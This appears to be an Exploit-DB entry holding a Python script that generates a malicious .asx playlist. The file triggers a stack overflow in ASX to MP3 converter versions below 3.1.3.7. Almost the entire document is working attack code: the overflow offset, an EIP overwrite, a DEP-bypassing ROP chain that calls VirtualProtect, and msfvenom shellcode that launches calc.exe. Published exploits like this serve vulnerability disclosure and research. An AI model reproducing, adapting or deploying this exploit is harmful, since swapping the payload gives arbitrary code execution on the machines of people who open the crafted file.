ASX to MP3 converter < 3.1.3.7 - '.asx' Local Stack Overflow (DEP Bypass)

EDB-ID:

42963




Platform:

Windows

Date:

2017-10-08


import struct,sys
head ='''<ASX version="3.0">
<Entry>
<REF HREF="mms://site.com/ach/music/smpl/LACA-05928-002-tes_'''

#offset 17375
junk = "A" *17375

#0x1003df8e
#0x774e1035
EIP="\x36\x10\x4e\x77"

adjust="A" *4

def create_rop_chain():
    
    rop_gadgets = [
      0x73dd5dce,  # POP EAX # RETN [MFC42.DLL] 
      0x5d091368,  # ptr to &VirtualProtect() [IAT COMCTL32.dll]
      0x7608708e,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [MSVCP60.dll] 
      0x73dd40f1,  # XCHG EAX,ESI # RETN [MFC42.DLL] 
      0x7c96feb7,  # POP EBP # RETN [ntdll.dll] 
      0x7608fcec,  # & push esp # ret  [MSVCP60.dll]
      0x01c395d4,  # POP EAX # RETN [MSA2Mcodec00.dll] 
      0xfffffdff,  # Value to negate, will become 0x00000201
      0x77d74960,  # NEG EAX # RETN [USER32.dll] 
      0x7ca485b4,  # XCHG EAX,EBX # RETN [SHELL32.dll] 
      0x01d64827,  # POP EAX # RETN [msvos.dll] 
      0xffffffc0,  # Value to negate, will become 0x00000040
      0x77d74960,  # NEG EAX # RETN [USER32.dll] 
      0x71ab9b46,  # XCHG EAX,EDX # RETN [WS2_32.dll] 
      0x1003fd11,  # POP ECX # RETN [MSA2Mfilter03.dll] 
      0x77da1d04,  # &Writable location [USER32.dll]
      0x01d34691,  # POP EDI # RETN [MSA2Mctn01.dll] 
      0x76091182,  # RETN (ROP NOP) [MSVCP60.dll]
      0x7d7da123,  # POP EAX # RETN [WMVCore.DLL] 
      0x90909090,  # nop
      0x77195015,  # PUSHAD # RETN [OLEAUT32.dll] 
    ]
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
	
rop_chain = create_rop_chain()

#msfvenom -a x86 --platform Windows -p windows/exec cmd=calc.exe -f python -b "\x00\x0a\x0d EXITFUNC=seh
#badcharacters "\x00\x0a\x0d"

buf =  ""
buf += "\xda\xd6\xba\xf5\xa4\x32\xf4\xd9\x74\x24\xf4\x5d\x31"
buf += "\xc9\xb1\x31\x83\xc5\x04\x31\x55\x14\x03\x55\xe1\x46"
buf += "\xc7\x08\xe1\x05\x28\xf1\xf1\x69\xa0\x14\xc0\xa9\xd6"
buf += "\x5d\x72\x1a\x9c\x30\x7e\xd1\xf0\xa0\xf5\x97\xdc\xc7"
buf += "\xbe\x12\x3b\xe9\x3f\x0e\x7f\x68\xc3\x4d\xac\x4a\xfa"
buf += "\x9d\xa1\x8b\x3b\xc3\x48\xd9\x94\x8f\xff\xce\x91\xda"
buf += "\xc3\x65\xe9\xcb\x43\x99\xb9\xea\x62\x0c\xb2\xb4\xa4"
buf += "\xae\x17\xcd\xec\xa8\x74\xe8\xa7\x43\x4e\x86\x39\x82"
buf += "\x9f\x67\x95\xeb\x10\x9a\xe7\x2c\x96\x45\x92\x44\xe5"
buf += "\xf8\xa5\x92\x94\x26\x23\x01\x3e\xac\x93\xed\xbf\x61"
buf += "\x45\x65\xb3\xce\x01\x21\xd7\xd1\xc6\x59\xe3\x5a\xe9"
buf += "\x8d\x62\x18\xce\x09\x2f\xfa\x6f\x0b\x95\xad\x90\x4b"
buf += "\x76\x11\x35\x07\x9a\x46\x44\x4a\xf0\x99\xda\xf0\xb6"
buf += "\x9a\xe4\xfa\xe6\xf2\xd5\x71\x69\x84\xe9\x53\xce\x74"
buf += "\x1b\x6e\xda\xe1\x82\x1b\xa7\x6f\x35\xf6\xeb\x89\xb6"
buf += "\xf3\x93\x6d\xa6\x71\x96\x2a\x60\x69\xea\x23\x05\x8d"
buf += "\x59\x43\x0c\xee\x3c\xd7\xcc\xdf\xdb\x5f\x76\x20"

shellcode="S"*10+buf

print "Length of shellcode is:",len(shellcode)
print "Length of ropchain is:",len(rop_chain)

print"Calculating Garbage:",(26000-17375-4-4-len(shellcode)-len(rop_chain))

garbage= "C" *8303

foot ='''_playlis.wma"/>
</Entry>
</ASX>'''

payload=head+junk+EIP+adjust+rop_chain+shellcode+garbage+foot

fobj = open("exploit.asx","w")
fobj.write(payload)
fobj.close()